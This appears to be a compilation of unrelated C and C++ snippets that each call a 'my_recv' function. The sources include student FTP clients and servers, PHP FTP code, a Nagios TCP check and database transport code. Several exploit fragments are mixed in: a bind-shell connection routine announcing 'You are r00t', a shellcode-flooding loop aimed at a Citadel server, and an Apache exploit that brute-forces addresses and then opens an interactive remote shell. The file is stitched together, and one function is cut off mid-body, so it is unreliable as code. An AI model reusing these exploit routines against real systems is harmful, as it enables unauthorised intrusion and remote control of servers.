void start_transfert(s_server srv, char *file)
{
int fd;
int size;
struct stat st;
int octel;
char buff[BUFF_UP];
octel = 0;
if ((fd = open(file, O_CREAT | O_TRUNC | O_RDWR, 0755)) == -1)
{
my_send(srv.socket_client, "450 Impossible to create file\n",
my_strlen("450 Impossible to create file\n"), (int)NULL);
xfree(file);
return ;
}
my_recv(srv.socket_client, &st, sizeof(st), (int)NULL);
size = st.st_size;
my_memset(buff, 0, BUFF_UP);
while (size > 0)
{
octel = my_recv(srv.socket_client, buff, BUFF_UP, (int)NULL);
xwrite(fd, buff, octel);
size = size - octel;
}
close(fd);
send_result(octel, srv);
}
void view_query(char *str, s_client cl)
{
int size_recv;
int len_tot;
char *querry;
my_memset(str, 0, BUFF_MAX);
querry = str;
len_tot = 0;
size_recv = my_recv(cl.server_socket, str, BUFF_MAX, (int)NULL);
while (querry[size_recv] != '\0' && (len_tot < BUFF_MAX))
{
querry = &(querry[size_recv]);
my_putstr(querry);
size_recv = my_recv(cl.server_socket, querry, BUFF_MAX, (int)NULL);
len_tot = len_tot + size_recv;
}
my_putstr(str);
my_recv(cl.server_socket, querry, BUFF_MAX, (int)NULL);
querry[3] = '\0';
if (querry[0] == '2')
my_putstr("\nSucess\n");
else
my_putstr("\nError\n");
}
/*
* 用户信息注册,conn_ed---从该连接套接字上接收信息
*
*/
void use_register(int conn_fd)
{
char buf[32];
char name[32]; //用户名
char passwd1[32]; //分别保存两次输入密码
char passwd2[32];
char string[40]; //缓存区
int flag = 1; //循环标志,1时执行,0退出
memset(string, 0, sizeof(string));
send_data(conn_fd, "r\n");
sleep(1);
my_recv(conn_fd, buf, sizeof(buf));
if (buf[0] == 'b')
{
do
{
send_data(conn_fd, "u\n");
sleep(1);
my_recv(conn_fd, buf, sizeof(buf));
input_userinfo(conn_fd, "\n\n\t\t用户名:");
sleep(1);
my_recv(conn_fd, buf, sizeof(buf));
if (buf[0] == 'n')
{
printf("该用户已存在\n");
continue;
}
printf("恭喜您,该用户名可以使用,请继续操作\n");
printf("请输入密码:");
get_passwd(passwd1);
printf("\n请再次输入密码:");
get_passwd(passwd2);
if (strcmp(passwd1, passwd2) != 0)
{
printf("两次输入不一致,请重新输入\n");
continue;
}
else
{
flag = 0;
}
passwd1[strlen(passwd1)] = '\n';
passwd1[strlen(passwd1) + 1] = '\0';
send_data(conn_fd, "p\n");
sleep(1);
my_recv(conn_fd, buf, sizeof(buf));
send_data(conn_fd, passwd1);
sleep(1);
my_recv(conn_fd, buf, sizeof(buf));
if (buf[0] == 'y')
{
printf("注册成功\n");
return;
}
}while (flag);
}
}
static void config_upload_data(int fd, config_backup_t *cfg_bkp)
{
FILE *fpw;
backup_frame_t frame;
int n_read, n_left, seq = 0;
char buf[DEF_BACKUP_FRAME_SIZE];
fpw = fopen(DEF_REVERT_FILE, "w");
if (!fpw)
return ;
n_left = get_backup_left_size(cfg_bkp);
show_debug("left: %d<-----------------------\n", n_left);
while (n_left > 0)
{
n_read = my_recv(fd, &frame, sizeof(backup_frame_t), 0);
if (n_read != sizeof(backup_frame_t))
break;
n_left -= n_read;
if (DEF_REVERT_MAGIC != frame.magic)
break;
if (seq++ != frame.seq)
break;
if (0 >= frame.payload_len)
break;
if (DEF_BACKUP_KEY != frame.secret_key)
break;
n_read = my_recv(fd, buf, frame.payload_len, 0);
if (n_read != frame.payload_len)
break;
config_simple_decrypt(&frame, buf, n_read);
fwrite(buf, 1, n_read, fpw);
n_left -= n_read;
set_backup_left_size(cfg_bkp, n_left);
}
show_debug("left: %d<-----------------------\n", n_left);
fclose(fpw);
if (!n_left)
{
char sys_cmd[DEF_SYS_COMMAND_SIZE];
sprintf(sys_cmd, "tar -jxvf %s -C %s", DEF_REVERT_FILE,
(char*)proxy_get_data_file_path());
system(sys_cmd);
proxy_task_t *task;
task = proxy_new_task(REBOOT_SERVER, NULL, 0, NULL, NULL);
if (task)
proxy_thread_pool_push(task);
}
}
void user_land(int conn_fd)
{
char name[32];
char passwd[32];
char buf[SIZE];
int i;
send_data(conn_fd, "l\n");
sleep(1);
my_recv(conn_fd, buf, sizeof(buf));
if (buf[0] == BEGIN)
{
while(1)
{
send_data(conn_fd, "u\n");
sleep(1);
system("clear");
my_recv(conn_fd, buf, sizeof(buf));
input_userinfo(conn_fd, "\n\n\t\t用户名:");
sleep(1);
my_recv(conn_fd, buf, sizeof(buf));
if (buf[0] == 'n')
{
printf("该用户不存在,请重新输入\n");
continue;
}
printf("\t\t密码:");
get_passwd(passwd);
send_data(conn_fd, "p\n");
sleep(1);
my_recv(conn_fd, buf, sizeof(buf));
send_data(conn_fd, passwd);
sleep(1);
my_recv(conn_fd, buf, sizeof(buf));
if (buf[0] == INVALID_USERINFO)
{
printf("密码错误,请重新输入\n");
continue;
}
else
{
break;
}
}
system("clear");
printf("\n\n\tftp服务器欢迎您,请选择操作\n");
sleep(1);
user_choose(conn_fd);
}
}
int main(int argc, char *argv[])
{
struct hostent *he;
fd_set readfds;
struct timeval tv;
tv.tv_sec = 5;
tv.tv_usec = 0;
FD_ZERO(&readfds);
FD_SET(0, &readfds);
FD_SET(RPORT, &readfds);
FD_SET(DPORT, &readfds);
if(argc != 2) {
fprintf(stderr, "usage address");
exit(1);
}
if((he=gethostbyname(argv[1])) == NULL ) {
perror("gethostbyname ");
exit(1);
}
if( strncmp(argv[0],"./server",3) == 0)
goto server;
while(1) {
printf("your msg===>>>\n");
if (my_send(he,DPORT) == 5)
printf("==>>msg send!\n");
else
printf("!!! sending failed.\n");
my_recv(RPORT);
}
server: while(1) {
my_recv(DPORT);
printf("your msg===>>>\n");
if (my_send(he,RPORT) == 5)
printf("==>>msg send!\n");
else
printf("!!! sending failed.\n");
}
return 0;
}
Uint32 get_msg(t_client *client)
{
int result;
static char *data = 0;
if (!data) // can't be dealloced, so using malloc system
if (!(data = (char*)malloc(sizeof(*data) * NET_MSS)))
{
fprintf(stderr, "Not enough memory\n");
exit(43);
}
result = my_recv(client->sock, data, NET_MSS);
if (result <= 0)
{
if (SDLNet_GetError() && strlen(SDLNet_GetError()))
{
NETDEBUG(SDLNet_GetError());
}
client->state = (unsigned long)STATE_FAIL_RECV;
fprintf(stderr, "loss state :%s, %d, %d\n",
strerror(errno), result, (int)data);
// met dans list deadclient, avec un etat 'fail_recv'
// (essaie donc d'ecrire qd meme sur la socket)
// ou la liste de commandes est trop importante..
return (0);
}
if (cut_trame_in_msg(client, data, result))
return (1);
return (0);
}
/*
* Same as Kgio::SocketMethods#kgio_read, except EOFError is raised
* on EOF without a backtrace
*/
static VALUE kgio_recv_bang(int argc, VALUE *argv, VALUE io)
{
VALUE rv = my_recv(1, argc, argv, io);
if (NIL_P(rv)) my_eof_error();
return rv;
}
/*输入用户名, 然后通过fd发送出去*/
void input_userinfo(int conn_fd, const char *string)
{
char input_buf[32];
char recv_buf[BUFSIZE];
int flag_userinfo;
/*输入用户信息直到正确为止*/
do {
printf("%s :",string);
if (get_userinfo(input_buf, 32) < 0) { //调用get_userinfo()获取用户输入数据存入input_buf
printf("error return from get_userinfo\n");
exit(1);
}
if (send(conn_fd, input_buf, strlen(input_buf), 0) < 0) { //在TCP套接字上发送数据,fd为套接字描述符,buf为要发送的缓冲区
my_err("send", __LINE__);
}
/*从连接套接字上读取一次数据*/
if(my_recv(conn_fd,recv_buf, sizeof(recv_buf)) < 0) { //从连接套接字上读取一次数据
printf("data is too long\n");
exit(1);
}
if(recv_buf[0] == VALID_USERINFO) {
flag_userinfo = VALID_USERINFO;
} else {
printf("%s error,input again", string); //错误,将flag_userinfo置为用户信息无效
flag_userinfo = INVALID_USERINFO;
}
} while(flag_userinfo = INVALID_USERINFO);
}
int
ftp_get(ftpbuf_t *ftp, FILE *outfp, const char *path, ftptype_t type)
{
databuf_t *data = NULL;
char *ptr;
int lastch;
int rcvd;
if (ftp == NULL)
return 0;
if (!ftp_type(ftp, type))
goto bail;
if ((data = ftp_getdata(ftp)) == NULL)
goto bail;
if (!ftp_putcmd(ftp, "RETR", path))
goto bail;
if (!ftp_getresp(ftp) || (ftp->resp != 150 && ftp->resp != 125))
goto bail;
if ((data = data_accept(data)) == NULL)
goto bail;
lastch = 0;
while ((rcvd = my_recv(data->fd, data->buf, FTP_BUFSIZE))) {
if (rcvd == -1)
goto bail;
if (type == FTPTYPE_ASCII) {
for (ptr = data->buf; rcvd; rcvd--, ptr++) {
if (lastch == '\r' && *ptr != '\n')
putc('\r', outfp);
if (*ptr != '\r')
putc(*ptr, outfp);
lastch = *ptr;
}
}
else {
fwrite(data->buf, rcvd, 1, outfp);
}
}
if (type == FTPTYPE_ASCII && lastch == '\r')
putc('\r', outfp);
data = data_close(data);
if (ferror(outfp))
goto bail;
if (!ftp_getresp(ftp) || (ftp->resp != 226 && ftp->resp != 250))
goto bail;
return 1;
bail:
data_close(data);
return 0;
}
void sighandler(int sig){
message_t msgsnd, msgrcv;
printf("\ncompute get signal ");
print_sig(sig);
msgsnd.type= CEND;
msgsnd.id= getpid();
msgsnd.data= (finished= TRUE? n: n-1);
if(my_send(fds, &msgsnd, sizeof(message_t), 0)== -1){
fprintf(stderr, "my_send\n");
close(fds);
exit(EXIT_FAILURE);
}
if(my_recv(fds, &msgrcv, sizeof(message_t), 0)== -1){
fprintf(stderr, "my_recv\n");
close(fds);
exit(EXIT_FAILURE);
}
if(msgrcv.type!= CEND){
fprintf(stderr, "unexpected type\n");
close(fds);
exit(EXIT_FAILURE);
}
close(fds);
exit(EXIT_SUCCESS);
}
//输入用户名 ,然后通过fd发送出去
void input_userinfo(int conn_fd ,const char *string)
{
char input_buf[32];
char recv_buf[BUFSIZE];
int flag_userinfo;
//输入用户信息直到正确为止
do {
printf("%s:" ,string);
if(get_userinfo(input_buf ,32) < 0)
{
printf("errno return from get_userinfo");
exit(1);
}
if(send(conn_fd ,input_buf ,strlen(input_buf) ,0) < 0)
{
my_err("send" ,__LINE__);
}
//从连接套接字上读取一次数据
if(my_recv(conn_fd ,recv_buf ,sizeof(recv_buf)) < 0)
{
printf("data is too long\n");
exit(1);
}
if(recv_buf[0] == VALID_USERINFO)
{
flag_userinfo = VALID_USERINFO;
}
else
{
printf("%s errno ,input again,",string);
flag_userinfo = INVALID_USERINFO;
}
} while(flag_userinfo == INVALID_USERINFO);
}
/* {{{ ftp_nb_continue_read
*/
int
ftp_nb_continue_read(ftpbuf_t *ftp)
{
databuf_t *data = NULL;
char *ptr;
int lastch;
size_t rcvd;
ftptype_t type;
data = ftp->data;
/* check if there is already more data */
if (!data_available(ftp, data->fd)) {
return PHP_FTP_MOREDATA;
}
type = ftp->type;
lastch = ftp->lastch;
if ((rcvd = my_recv(ftp, data->fd, data->buf, FTP_BUFSIZE))) {
if (rcvd == -1) {
goto bail;
}
if (type == FTPTYPE_ASCII) {
for (ptr = data->buf; rcvd; rcvd--, ptr++) {
if (lastch == '\r' && *ptr != '\n') {
php_stream_putc(ftp->stream, '\r');
}
if (*ptr != '\r') {
php_stream_putc(ftp->stream, *ptr);
}
lastch = *ptr;
}
} else if (rcvd != php_stream_write(ftp->stream, data->buf, rcvd)) {
goto bail;
}
ftp->lastch = lastch;
return PHP_FTP_MOREDATA;
}
if (type == FTPTYPE_ASCII && lastch == '\r') {
php_stream_putc(ftp->stream, '\r');
}
ftp->data = data = data_close(ftp, data);
if (!ftp_getresp(ftp) || (ftp->resp != 226 && ftp->resp != 250)) {
goto bail;
}
ftp->nb = 0;
return PHP_FTP_FINISHED;
bail:
ftp->nb = 0;
ftp->data = data_close(ftp, data);
return PHP_FTP_FAILED;
}
int download_file(int mode)
{
int len, localServerSock, dataSock, bindShellSock;
struct sockaddr_in localServer;
status_bar("Downloading");
// Ask the victim server to send us the exploit file
my_send(controlSock, "RETR %s\r\n", filename);
// Create a listening server on our passive port to
// receive the data
memset(&localServer,0,sizeof(localServer));
localServerSock=create_passive_server();
len=sizeof(localServer);
// Wait for a few seconds for the victim server to contact us...
if((dataSock=timeout_accept(localServerSock,(struct sockaddr *)&localServer,&len))<0) {
close(localServerSock);
return FAILURE;
}
// If the mode is EXPLOIT_DOWNLOAD, then this is the
// second attempt at downloading... that means we might
// have a shell waiting for us on the victim server, so
// we try to connect to it
if(mode==EXPLOIT_DOWNLOAD) {
if((bindShellSock=connect_to_server(BINDSHELL_PORT))>=0) {
printf("\nConnected! You are r00t...\n");
do_remote_shell(bindShellSock);
printf("\nDid you have a nice time?\n");
exit(0);
}
close(dataSock);
close(localServerSock);
return SUCCESS;
}
// If the mode is NORMAL_DOWNLOAD, then just clean up the
// connection by receiving the file from the server; closing
// the data and local server sockets, then read the confirmation
// message from the control socket
my_recv(dataSock);
close(dataSock);
close(localServerSock);
my_recv(controlSock);
return check_status();
}
int my_recvall(int sock, void* buf, size_t len)
{
int got = 0, tmp;
while ((tmp = my_recv(sock, buf + got, len - got)) > 0) {
got += tmp;
}
return got;
}
void server_download(int conn_fd, const char * pathname, char * len)
{
int fd;
char buf[SIZE];
char choose[SIZE];
int ret;
int lenght = 0;
int sum = 0;
int flag;
int i = 0;
char tmp[SIZE];
long r_len;
char log[SIZE];
if ((fd = open(pathname, O_RDONLY)) == -1)
{
strcpy(log, pathname);
strcat(log, " 下载失败");
sys_log(log);
return ;
}
strcpy(log, " 文件名:");
strcat(log, pathname);
strcat(log, " 下载文件大小:");
strcat(log, len);
sys_log(log);
send_data(conn_fd, len);
recv(conn_fd, tmp, sizeof(tmp), 0);
r_len = atol(tmp);
lseek(fd, r_len, SEEK_SET);
while (1)
{
flag = read(fd, buf, SIZE);
sum += flag;
ret = send(conn_fd, buf, flag, 0);
if (flag != SIZE)
{
break;
}
}
close (fd);
memset(log, '\0', sizeof(log));
strcpy(log, " 下载成功,");
my_recv(conn_fd, buf, sizeof(buf));
if (buf[0] == 'y')
{
sys_log(" 用户返回选择界面 ");
deal(conn_fd);
}
else
{
return ;
}
}
int
TCP_Transporter::doReceive(TransporterReceiveHandle& recvdata)
{
// Select-function must return the socket for read
// before this method is called
// It reads the external TCP/IP interface once
Uint32 size = receiveBuffer.sizeOfBuffer - receiveBuffer.sizeOfData;
if(size > 0){
const int nBytesRead = (int)my_recv(theSocket,
receiveBuffer.insertPtr,
size < maxReceiveSize ? size : maxReceiveSize,
0);
if (nBytesRead > 0) {
receiveBuffer.sizeOfData += nBytesRead;
receiveBuffer.insertPtr += nBytesRead;
if(receiveBuffer.sizeOfData > receiveBuffer.sizeOfBuffer){
#ifdef DEBUG_TRANSPORTER
g_eventLogger->error("receiveBuffer.sizeOfData(%d) > receiveBuffer.sizeOfBuffer(%d)",
receiveBuffer.sizeOfData, receiveBuffer.sizeOfBuffer);
g_eventLogger->error("nBytesRead = %d", nBytesRead);
#endif
g_eventLogger->error("receiveBuffer.sizeOfData(%d) > receiveBuffer.sizeOfBuffer(%d)",
receiveBuffer.sizeOfData, receiveBuffer.sizeOfBuffer);
report_error(TE_INVALID_MESSAGE_LENGTH);
return 0;
}
receiveCount ++;
receiveSize += nBytesRead;
m_bytes_received += nBytesRead;
if(receiveCount == reportFreq){
recvdata.reportReceiveLen(remoteNodeId,
receiveCount, receiveSize);
receiveCount = 0;
receiveSize = 0;
}
return nBytesRead;
} else {
#if defined DEBUG_TRANSPORTER
g_eventLogger->error("Receive Failure(disconnect==%d) to node = %d nBytesSent = %d "
"errno = %d strerror = %s",
DISCONNECT_ERRNO(my_socket_errno(), nBytesRead),
remoteNodeId, nBytesRead, my_socket_errno(),
(char*)ndbstrerror(my_socket_errno()));
#endif
if(DISCONNECT_ERRNO(my_socket_errno(), nBytesRead)){
do_disconnect(my_socket_errno());
}
}
return nBytesRead;
} else {
return 0;
}
}
int set_path_and_filename()
{
status_bar("Setting filename");
if(strcmp(uploadPath,"")) {
my_send(controlSock, "CWD %s\r\n",uploadPath);
my_recv(controlSock);
}
snprintf(filename,SIZE,"proft_put_down-%d-%d.txt",getpid(),attemptNumber);
return SUCCESS;
}
// Flood the citadel server CHANCE_COUNTER times with the shellcode
// to try and make it more likely for the shellcode to be in the right
// place at the right time. This function makes one helluva difference
// to the exploits reliability (100% reliable to date).
void increase_chances(int s, int m) {
char buf[SIZ];
int i;
make_shellcode(buf);
for(i=0;i<CHANCE_COUNTER;i++) {
my_send(s, "IPGM %d %s\n", m, buf);
my_recv(s);
}
}
ssize_t
SocketInputStream2::read_socket(char* buf, size_t len)
{
if (!has_data_to_read())
return -1;
size_t read_res = my_recv(m_socket, buf, len, 0);
if (read_res == 0)
return -1; // Has data to read but only EOF received
return read_res;
}
/* {{{ ftp_readline
*/
int
ftp_readline(ftpbuf_t *ftp)
{
long size, rcvd;
char *data, *eol;
/* shift the extra to the front */
size = FTP_BUFSIZE;
rcvd = 0;
if (ftp->extra) {
memmove(ftp->inbuf, ftp->extra, ftp->extralen);
rcvd = ftp->extralen;
}
data = ftp->inbuf;
do {
size -= rcvd;
for (eol = data; rcvd; rcvd--, eol++) {
if (*eol == '\r') {
*eol = 0;
ftp->extra = eol + 1;
if (rcvd > 1 && *(eol + 1) == '\n') {
ftp->extra++;
rcvd--;
}
if ((ftp->extralen = --rcvd) == 0) {
ftp->extra = NULL;
}
return 1;
} else if (*eol == '\n') {
*eol = 0;
ftp->extra = eol + 1;
if ((ftp->extralen = --rcvd) == 0) {
ftp->extra = NULL;
}
return 1;
}
}
data = eol;
if ((rcvd = my_recv(ftp, ftp->fd, data, size)) < 1) {
return 0;
}
} while (size);
return 0;
}
static int my_gets(SOCKET sock, char * line, int maxlen)
{
int last_rval = 0;
while (((last_rval = my_recv(sock, line, 1)) == 1) && maxlen > 0) {
if (*line == '\n') {
line++;
*line = 0;
break;
} else {
line++;
maxlen--;
}
}
return last_rval;
}
/*
* Receive one line, copy it into buf and nul-terminate it. Returns the
* number of bytes written to buf (excluding the '\0') or 0 on EOF or <0 on
* error.
*
* TODO: Reading one byte at a time is very inefficient. Replace this by a
* function which buffers the data, move that to netutils.c and change
* check_smtp and other plugins to use that. Also, remove (\r)\n.
*/
int
recvline(char *buf, size_t bufsize)
{
int result;
unsigned i;
for (i = result = 0; i < bufsize - 1; i++) {
if ((result = my_recv(&buf[i], 1)) != 1)
break;
if (buf[i] == '\n') {
buf[++i] = '\0';
return i;
}
}
return (result == 1 || i == 0) ? -2 : result; /* -2 if out of space */
}
void deal(int conn_fd)
{
char buf[32];
char name[32];
char passwd[32];
char pathname[SIZE] = {"/home/qiong/userinfo/"};
int ret;
int flag;
int fd;
int zan;
my_recv(conn_fd, buf, sizeof(buf));
printf("%c\n", buf[0]);
if (buf[0] == 'l')
{
sys_log("进入用户登陆界面");
server_check(conn_fd);
}
else if (buf[0] == 'r')
{
sys_log("进入用户注册界面");
server_register(conn_fd);
}
else if (buf[0] == 'x')
{
chdir("/home/qiong/shujia/source/");
server_browse(conn_fd, "../source/");
}
else if (buf[0] == 'q')
{
sys_log("浏览本地上传目录");
chdir("/home/qiong/shujia/source/");
server_look(conn_fd, "../source/");
}
else if (buf[0] == 'd')
{
sys_log("查找资源");
sys_find(conn_fd);
deal(conn_fd);
}
}
int set_passive_mode(int mode)
{
int portMSB, portLSB;
int x1,x2,x3,x4;
char *ptr=localIP, *start;
status_bar("Setting passive");
if(mode==DOWNLOAD) {
if((++currentPassivePort) > 35000)
currentPassivePort=32789;
while(*(++ptr))
if(*ptr=='.')
*ptr=',';
portMSB=(currentPassivePort >> 8 ) & 0xff;
portLSB=currentPassivePort & 0xff;
my_send(controlSock, "PORT %s,%d,%d\r\n", localIP, portMSB, portLSB);
my_recv(controlSock);
return check_status();
} else {
void input_userinfo(int conn_fd,char *string) //输入用户名,通过conn_fd 发出
{
char input_buf[32];
char recv_buf[BUFMAX];
int flag_userinfo;
do
{
printf(" %s:",string);
if(get_userinfo(input_buf,32)<0)
{
printf("error return from get_userinfo \n");
exit(1);
}
if(send(conn_fd,input_buf,strlen(input_buf),0)<0)
{
perror("send");
}
if(my_recv(conn_fd,recv_buf,sizeof(recv_buf))<0)
{
printf("data to long\n");
exit(1);
}
if(recv_buf[0]==VALID_USERINFO)
{
flag_userinfo=VALID_USERINFO;
}
else
{
printf(" %s error ,input again ",string);
flag_userinfo=INVALID_USERINFO;
}
}while(flag_userinfo==INVALID_USERINFO);
}
int attempt_exploit(void) {
fd_set rfds;
int sock,retVal,r;
if(exactPointerAddy) {
printf("[-] Using 0x%08x for pointer addy\n", exactPointerAddy);
if((sock=connect_to_host(HTTP_PORT))<=0)
return sock;
magic_r=exactPointerAddy;
make_exploitbuf(buf);
my_send(sock, buf);
my_recv(sock);
close(sock);
my_sleep(100000);
if((sock=connect_to_host(SHELL_PORT))<=0) {
return sock;
}
} else { // Do crappy bruteforce loop
printf("[-] Attempting attack [ %s ] ...\n", targets[useTarget].platform);
MAGIC_R_START=targets[useTarget].bruteStart;
MAGIC_R_END=targets[useTarget].bruteEnd;
retAddr=targets[useTarget].retAddr;
for(magic_r=MAGIC_R_START; magic_r<=MAGIC_R_END; magic_r++) {
printf("[-] Trying 0x%08x ... \r", magic_r);fflush(stdout);
if((sock=connect_to_host(HTTP_PORT))<=0)
return sock;
make_exploitbuf(buf);
my_send(sock, buf);
my_recv(sock);
close(sock);
my_sleep(50000);
if((sock=connect_to_host(SHELL_PORT))>=SUCCESS) {
printf("\n[-] Found request_rec address @ 0x%08x\n", magic_r);
break;
}
}
if(magic_r>MAGIC_R_END)
return BRUTE_FORCE_EXHAUSTED;
}
printf("[-] Connected to %s! You can type commands now:\n", host);
// Now let the attacker issue commands to the remote
// shell, just as if (s)he had launched 'nc host 45295'.
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
retVal=select(sock+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(sock, &rfds)) {
buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad!
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, SIZ-1))]='\0'; // bad!
send(sock, buf, strlen(buf), 0);
}
}
} while(retVal && r); // loop until connection terminates
close(sock);
return SUCCESS;
}
int main(int argc, char **argv)
{
int i;
int ret;
int conn_fd;
int serv_port;
struct sockaddr_in serv_addr;
char recv_buf[BUFSIZE];
/*检查参数个数*/
if(argc != 5) {
printf("Usage: [-p] [serv_port] [-a] [serv_address]\n");
exit(1);
}
/*初始化服务器端地址结构*/
memset(&serv_addr, 0, sizeof(struct sockaddr_in)); //初始化服务器端地址结构
serv_addr.sin_family = AF_INET;
/*从命令行获取服务器端的端口和地址*/
for(i=1; i<argc; i++) {
if(strcmp("-p", argv[i]) == 0) {
serv_port = atoi(argv[i+1]); //atoi()把字符串转换程长整型数
if(serv_port < 0 || serv_port > 65535) {
printf("invalid serv_addr.sin_port\n");
exit(1);
} else {
serv_addr.sin_port = htons(serv_port); //htons用于将主机中unsigned short型数据转换成网络字节顺序
}
continue;
}
if(strcmp("-a",argv[i]) == 0) {
if(inet_aton(argv[i+1], &serv_addr.sin_addr) == 0) {
printf("invalid server ip address\n");
exit(1);
}
continue;
}
}
/*检测是否少了某项参数*/
if(serv_addr.sin_port == 0 || serv_addr.sin_addr.s_addr == 0) {
printf("Usage:[-p] [serv_addr.sin_port] [-a][serv_address]\n");
exit(1);
}
/*创建一个TCP套接字*/
conn_fd = socket(AF_INET, SOCK_STREAM, 0);
if(conn_fd < 0) {
my_err("socket", __LINE__);
}
/*向服务器端发送连接请求*/
if(connect(conn_fd, (struct sockaddr *)&serv_addr, sizeof(struct sockaddr)) < 0) {
my_err("connect", __LINE__);
}
/*输入用户名和密码*/
input_userinfo(conn_fd, "username");
input_userinfo(conn_fd, "password");
/* 读取欢迎信息并打印出来*/
if((ret = my_recv(conn_fd, recv_buf, sizeof(recv_buf))) < 0) {
printf("data is too long\n");
exit(1);
}
for(i=0; i<ret; i++) {
printf("%c", recv_buf[i]);
}
printf("\n");
close(conn_fd);
return 0;
}
int
main (int argc, char **argv)
{
int result = STATE_UNKNOWN;
int i;
char *status = NULL;
struct timeval tv;
size_t len;
int match = -1;
setlocale (LC_ALL, "");
bindtextdomain (PACKAGE, LOCALEDIR);
textdomain (PACKAGE);
/* determine program- and service-name quickly */
progname = strrchr(argv[0], '/');
if(progname != NULL) progname++;
else progname = argv[0];
len = strlen(progname);
if(len > 6 && !memcmp(progname, "check_", 6)) {
SERVICE = strdup(progname + 6);
for(i = 0; i < len - 6; i++)
SERVICE[i] = toupper(SERVICE[i]);
}
/* set up a resonable buffer at first (will be realloc()'ed if
* user specifies other options) */
server_expect = calloc(sizeof(char *), 2);
/* determine defaults for this service's protocol */
if (!strncmp(SERVICE, "UDP", 3)) {
PROTOCOL = IPPROTO_UDP;
}
else if (!strncmp(SERVICE, "FTP", 3)) {
EXPECT = "220";
QUIT = "QUIT\r\n";
PORT = 21;
}
else if (!strncmp(SERVICE, "POP", 3) || !strncmp(SERVICE, "POP3", 4)) {
EXPECT = "+OK";
QUIT = "QUIT\r\n";
PORT = 110;
}
else if (!strncmp(SERVICE, "SMTP", 4)) {
EXPECT = "220";
QUIT = "QUIT\r\n";
PORT = 25;
}
else if (!strncmp(SERVICE, "IMAP", 4)) {
EXPECT = "* OK";
QUIT = "a1 LOGOUT\r\n";
PORT = 143;
}
#ifdef HAVE_SSL
else if (!strncmp(SERVICE, "SIMAP", 5)) {
EXPECT = "* OK";
QUIT = "a1 LOGOUT\r\n";
flags |= FLAG_SSL;
PORT = 993;
}
else if (!strncmp(SERVICE, "SPOP", 4)) {
EXPECT = "+OK";
QUIT = "QUIT\r\n";
flags |= FLAG_SSL;
PORT = 995;
}
else if (!strncmp(SERVICE, "SSMTP", 5)) {
EXPECT = "220";
QUIT = "QUIT\r\n";
flags |= FLAG_SSL;
PORT = 465;
}
else if (!strncmp(SERVICE, "JABBER", 6)) {
SEND = "<stream:stream to=\'host\' xmlns=\'jabber:client\' xmlns:stream=\'http://etherx.jabber.org/streams\'>\n";
EXPECT = "<?xml version=\'1.0\'?><stream:stream xmlns=\'jabber:client\' xmlns:stream=\'http://etherx.jabber.org/streams\'";
QUIT = "</stream:stream>\n";
flags |= FLAG_HIDE_OUTPUT;
PORT = 5222;
}
else if (!strncmp (SERVICE, "NNTPS", 5)) {
server_expect_count = 2;
server_expect[0] = "200";
server_expect[1] = "201";
QUIT = "QUIT\r\n";
flags |= FLAG_SSL;
PORT = 563;
}
#endif
else if (!strncmp (SERVICE, "NNTP", 4)) {
server_expect_count = 2;
server_expect = malloc(sizeof(char *) * server_expect_count);
server_expect[0] = strdup("200");
server_expect[1] = strdup("201");
QUIT = "QUIT\r\n";
PORT = 119;
}
else if (!strncmp(SERVICE, "CLAMD", 5)) {
SEND = "PING";
EXPECT = "PONG";
QUIT = NULL;
PORT = 3310;
}
/* fallthrough check, so it's supposed to use reverse matching */
else if (strcmp (SERVICE, "TCP"))
usage (_("CRITICAL - Generic check_tcp called with unknown service\n"));
server_address = "127.0.0.1";
server_port = PORT;
server_send = SEND;
server_quit = QUIT;
status = NULL;
/* Parse extra opts if any */
argv=np_extra_opts (&argc, argv, progname);
if (process_arguments (argc, argv) == ERROR)
usage4 (_("Could not parse arguments"));
if(flags & FLAG_VERBOSE) {
printf("Using service %s\n", SERVICE);
printf("Port: %d\n", server_port);
printf("flags: 0x%x\n", (int)flags);
}
if(EXPECT && !server_expect_count)
server_expect_count++;
if(PROTOCOL==IPPROTO_UDP && !(server_expect_count && server_send)){
usage(_("With UDP checks, a send/expect string must be specified."));
}
/* set up the timer */
signal (SIGALRM, socket_timeout_alarm_handler);
alarm (socket_timeout);
/* try to connect to the host at the given port number */
gettimeofday (&tv, NULL);
result = np_net_connect (server_address, server_port, &sd, PROTOCOL);
if (result == STATE_CRITICAL) return STATE_CRITICAL;
#ifdef HAVE_SSL
if (flags & FLAG_SSL){
result = np_net_ssl_init(sd);
if (result == STATE_OK && check_cert == TRUE) {
result = np_net_ssl_check_cert(days_till_exp);
}
}
if(result != STATE_OK || check_cert == TRUE){
np_net_ssl_cleanup();
if(sd) close(sd);
return result;
}
#endif /* HAVE_SSL */
if (server_send != NULL) { /* Something to send? */
my_send(server_send, strlen(server_send));
}
if (delay > 0) {
tv.tv_sec += delay;
sleep (delay);
}
if(flags & FLAG_VERBOSE) {
if (server_send) {
printf("Send string: %s\n", server_send);
}
if (server_quit) {
printf("Quit string: %s\n", server_quit);
}
printf("server_expect_count: %d\n", (int)server_expect_count);
for(i = 0; i < server_expect_count; i++)
printf("\t%d: %s\n", i, server_expect[i]);
}
/* if(len) later on, we know we have a non-NULL response */
len = 0;
if (server_expect_count) {
/* watch for the expect string */
while ((i = my_recv(buffer, sizeof(buffer))) > 0) {
status = realloc(status, len + i + 1);
memcpy(&status[len], buffer, i);
len += i;
/* stop reading if user-forced or data-starved */
if(i < sizeof(buffer) || (maxbytes && len >= maxbytes))
break;
if (maxbytes && len >= maxbytes)
break;
}
/* no data when expected, so return critical */
if (len == 0)
die (STATE_CRITICAL, _("No data received from host\n"));
/* force null-termination and strip whitespace from end of output */
status[len--] = '\0';
/* print raw output if we're debugging */
if(flags & FLAG_VERBOSE)
printf("received %d bytes from host\n#-raw-recv-------#\n%s\n#-raw-recv-------#\n",
(int)len + 1, status);
while(isspace(status[len])) status[len--] = '\0';
match = np_expect_match(status,
server_expect,
server_expect_count,
(flags & FLAG_MATCH_ALL ? TRUE : FALSE),
(flags & FLAG_EXACT_MATCH ? TRUE : FALSE),
(flags & FLAG_VERBOSE ? TRUE : FALSE));
}
if (server_quit != NULL) {
my_send(server_quit, strlen(server_quit));
}
#ifdef HAVE_SSL
np_net_ssl_cleanup();
#endif
if (sd) close (sd);
microsec = deltime (tv);
elapsed_time = (double)microsec / 1.0e6;
